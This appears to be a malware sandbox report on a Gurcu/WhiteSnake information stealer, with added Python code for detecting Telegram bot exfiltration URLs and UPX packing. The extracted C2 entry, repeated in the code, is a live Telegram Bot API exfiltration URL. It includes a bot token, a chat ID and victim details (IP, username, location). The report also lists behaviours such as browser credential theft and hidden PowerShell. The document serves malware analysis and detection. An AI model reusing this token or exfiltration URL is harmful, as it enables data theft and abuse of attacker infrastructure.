General

  • Target

    redirect

  • Size

    6KB

  • Sample

    241018-vegkdazcnn

  • MD5

    b59cf59ea016575507e2d639f23030ba

  • SHA1

    5c5fecaf6bf60598cf2643260c5764105716ecfc

  • SHA256

    9c98b2eda2195c59d09c7ca75ee6aee2d3fdcd2a8af1d0a6d6c98149e73c11d1

  • SHA512

    6cedea8e12b23e702fde85fd697d6ab4563896b4509e89afba90e8121ed840beb09d97454afee477abcbf4130fc753b12dad4efcad2f1a28d90f0dbe4143ca79

  • SSDEEP

    192:d7HLxX7777/77QF7nzyrB0Lod4BYCIkKdOBGXwf1:d7r5HYlO0+CIkKdOBGXw9

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4549607810&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
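The extracted C2 is a Telegram Bot API call: the bot token sits in the URL path (`bot<BOT_ID>:<SECRET>`), the destination chat in `chat_id`, and the victim summary in the percent-encoded `caption`, with `sendDocument` as the exfiltration method. The following added example (my code, not part of the report or of the Gurcu/WhiteSnake sample) pulls those indicators out of web-proxy-style log lines and breaks the caption into fields. The log lines are constructed for the example; only the Telegram URL is taken from the report, and the `api.ipify.org` host stands in for whatever IP lookup service the sample actually uses, which the report does not name.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API URL: https://api.telegram.org/bot<BOT_ID>:<SECRET>/<method>[?query]
TELEGRAM_BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})"
    r"/(?P<method>\w+)\S*"
)

# The C2 URL as extracted by the sandbox (see Malware Config above).
C2_URL = (
    "https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument"
    "?chat_id=-4549607810&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:"
    "%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],"
    "%20London,%20Englan"
)

# Constructed proxy log lines (timestamp host client method url status); not from the report.
SAMPLE_PROXY_LOG = [
    f"2024-10-18T14:02:11Z WS01 10.0.0.17 POST {C2_URL} 200",
    "2024-10-18T14:02:12Z WS01 10.0.0.17 GET https://api.ipify.org/ 200",  # assumed IP lookup host
    "2024-10-18T14:02:13Z WS02 10.0.0.23 GET https://www.microsoft.com/ 200",
]


def find_telegram_bot_urls(lines):
    """Return every Telegram Bot API URL found in the given log lines."""
    return [m.group(0) for line in lines for m in TELEGRAM_BOT_URL.finditer(line)]


def parse_telegram_c2(url):
    """Split a Telegram Bot API exfiltration URL into its indicator components."""
    m = TELEGRAM_BOT_URL.match(url)
    if not m:
        raise ValueError("not a Telegram Bot API URL")
    query = parse_qs(urlsplit(url).query)           # parse_qs percent-decodes the values
    caption = query.get("caption", [""])[0]
    # The caption is a newline-separated "Key: value" block; keep the lines that fit that shape.
    fields = {}
    for raw in caption.split("\n"):
        key, sep, value = raw.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return {
        "bot_id": m["bot_id"],
        "token": f"{m['bot_id']}:{m['secret']}",   # the full secret, usable as a blocklist entry
        "method": m["method"],                      # sendDocument = file upload to the chat
        "chat_id": query.get("chat_id", [None])[0],
        "caption": caption,
        "fields": fields,
    }


if __name__ == "__main__":
    for url in find_telegram_bot_urls(SAMPLE_PROXY_LOG):
        c2 = parse_telegram_c2(url)
        print(c2["token"], c2["chat_id"], c2["method"], c2["fields"])
```

The bot ID and chat ID are the stable parts worth keeping as indicators; the caption wording (the `DOTSTEALER` banner and the `IP`/`Username`/`Location` lines) is what ties a proxy hit to this family rather than to any other tool that happens to post through the Telegram Bot API.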

Targets

    • Target

      redirect

    • Size

      6KB

    • MD5

      b59cf59ea016575507e2d639f23030ba

    • SHA1

      5c5fecaf6bf60598cf2643260c5764105716ecfc

    • SHA256

      9c98b2eda2195c59d09c7ca75ee6aee2d3fdcd2a8af1d0a6d6c98149e73c11d1

    • SHA512

      6cedea8e12b23e702fde85fd697d6ab4563896b4509e89afba90e8121ed840beb09d97454afee477abcbf4130fc753b12dad4efcad2f1a28d90f0dbe4143ca79

    • SSDEEP

      192:d7HLxX7777/77QF7nzyrB0Lod4BYCIkKdOBGXwf1:d7r5HYlO0+CIkKdOBGXw9

    • Gurcu, WhiteSnake

      Gurcu (also tracked as WhiteSnake) is an information stealer written in C#.

    • Renames multiple (158) files with added filename extension

      This suggests ransomware activity, i.e. the files on the system are being encrypted and renamed.

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials, cookies and autofill entries.

    • Checks installed software on the system

      Looks up entries under the registry Uninstall key to enumerate the software installed on the system.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP address.

    • UPX packed file

      Detects executables packed with the open-source UPX packer or a modified version of it.
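The UPX signature above matches on how the packer lays out a PE image. The following added example (my code, not the sandbox's detection rule or anything from the sample) shows the two checks a practitioner would typically combine: the stock `UPX0`/`UPX1` section names, and the layout that survives when a modified build renames them, namely a first section with a large virtual size but no data on disk (the unpack destination). The PE images it inspects are constructed header-only fixtures built by `build_pe`, not real binaries, and the heuristic is mine.

```python
import struct


def pe_sections(data):
    """Parse a PE section table; return (name, virtual_size, raw_size) per section."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]    # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]       # COFF SizeOfOptionalHeader
    table = coff + 20 + opt_size                                  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rsize, _rptr = struct.unpack_from("<8sIIII", data, table + i * 40)
        sections.append((name.rstrip(b"\0").decode("latin-1"), vsize, rsize))
    return sections


def upx_indicators(data):
    """Return the reasons an image looks UPX-packed; an empty list means no indicator fired."""
    secs = pe_sections(data)
    reasons = []
    if any(name.startswith("UPX") for name, _, _ in secs):
        reasons.append("UPX section names")
    # Stock and renamed UPX builds share the layout: the first section is the unpack
    # target, with a non-zero virtual size and SizeOfRawData == 0 (nothing on disk).
    if len(secs) >= 2:
        _, vsize, rsize = secs[0]
        if rsize == 0 and vsize > 0:
            reasons.append("first section has no raw data (unpack target)")
    return reasons


def build_pe(sections, opt_size=0xE0):
    """Build a minimal, non-runnable PE image with the given (name, vsize, rsize) sections.

    Test fixture only: the DOS stub, optional header and section data are zero-filled.
    """
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)      # PE32 magic, rest zeroed
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, 0x1000, rsize, 0, 0, 0, 0, 0, 0)
        for name, vsize, rsize in sections
    )
    return dos + b"PE\0\0" + coff + opt + table


# Constructed fixtures: a stock UPX layout, the same layout with renamed sections, and a plain image.
UPX_LIKE = build_pe([(b"UPX0", 0x9000, 0), (b"UPX1", 0x3000, 0x2800), (b".rsrc", 0x400, 0x400)])
RENAMED_UPX = build_pe([(b".text", 0x9000, 0), (b".data", 0x3000, 0x2800), (b".rsrc", 0x400, 0x400)])
NORMAL = build_pe([(b".text", 0x2000, 0x2000), (b".data", 0x400, 0x200), (b".rsrc", 0x400, 0x400)])

if __name__ == "__main__":
    for label, image in (("stock UPX", UPX_LIKE), ("renamed UPX", RENAMED_UPX), ("normal", NORMAL)):
        print(label, upx_indicators(image))
```

To run this against a real dropped file, read it with `open(path, "rb").read()` and pass the bytes to `upx_indicators`; the layout check is a heuristic, so treat a single hit as a lead to confirm by unpacking rather than as proof on its own.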

MITRE ATT&CK Enterprise v15
